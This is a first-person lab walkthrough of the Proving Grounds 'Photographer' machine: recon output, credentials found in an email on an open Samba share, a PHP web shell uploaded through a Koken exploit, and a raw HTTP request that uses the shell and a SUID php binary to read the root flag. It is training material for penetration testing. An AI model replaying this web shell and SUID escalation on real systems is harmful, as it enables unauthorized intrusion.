Proving Grounds - Photographer
I’ve started my OSCP journey a while ago, and I wanted to try the PG machines, this is the first one that I’ve tried. The machine is fairly straightforward and it’s labeled easy.
I’ve started with a simple nmap scan, which hinted that this Linux machine is part of an Active Directory.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 414daa1886948e88a74c6b426076f14f (RSA)
| 256 4da3d07a8f64ef82452d011318b7e013 (ECDSA)
|_ 256 1a017a4fcf9585bf31a14f1587ab94e2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
|_http-generator: Koken 0.22.24
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
On the port 80 we have a simple web page which is more or less just a placeholder of a template, but on the 8000 we have a functional website build with Koken
# Versions for :80
http://192.168.160.76:80/
[200 OK] Apache[2.4.18],
Country[RESERVED][ZZ], HTML5,
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)],
IP[192.168.160.76],
JQuery, Script,
Title[Photographer by v1n1v131r4]
# Versions for :8000
http://192.168.160.76:8000/
[200 OK] Apache[2.4.18],
Country[RESERVED][ZZ], HTML5,
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)],
IP[192.168.160.76], JQuery[1.12.4],
Meta-Author[daisa ahomi],
MetaGenerator[Koken 0.22.24],
Script, Title[daisa ahomi],
X-UA-Compatible[IE=edge]
I immediately searched for exploits for Koken 0.22.24, and found this one: https://www.exploit-db.com/exploits/48706
This is authenticated exploit, so it hinted that I must look further to get some credentials.
Upon scanning the Active Directory (139,445) I found public shares, one of which was non-default sambashare.
$ smbclient -N -L 192.168.160.76
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (photographer server (Samba, Ubuntu))
I explored it and found 2 files, one was an email in a txt format and the other one was zipped WordPress site, I’ve scanned the WordPress source code with gf (https://github.com/tomnomnom/gf) but found nothing. The mail thought had an interesting text inside that hinted two users and suggestion for a password.
agi@photographer.com - Agi Clarence
daisa@photographer.com - Daisa Ahomi
I found the password for the user daisa@photographer.com in the content of the mail. (It is very simple!)
After that, I logged into the Koken's Admin Panel and uploaded a simple PHP shell using the previously mentioned exploit. I could read the user/local.txt file that yielded the user own flag.
The root was pretty straightforward, upon scanning for SUID binaries, I found that /usr/bin/php7.2 was such, and a simple request with the previous active shell yielded me the root flag.
GET /storage/originals/4f/38/image.php?cmd=/usr/bin/php7.2+-r+'readfile("/root/proof.txt")%3b' HTTP/1.1
Host: 192.168.210.76:8000
Upgrade-Insecure-Requests: 1
User-Agent: ...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: koken_session_ci=...
Connection: close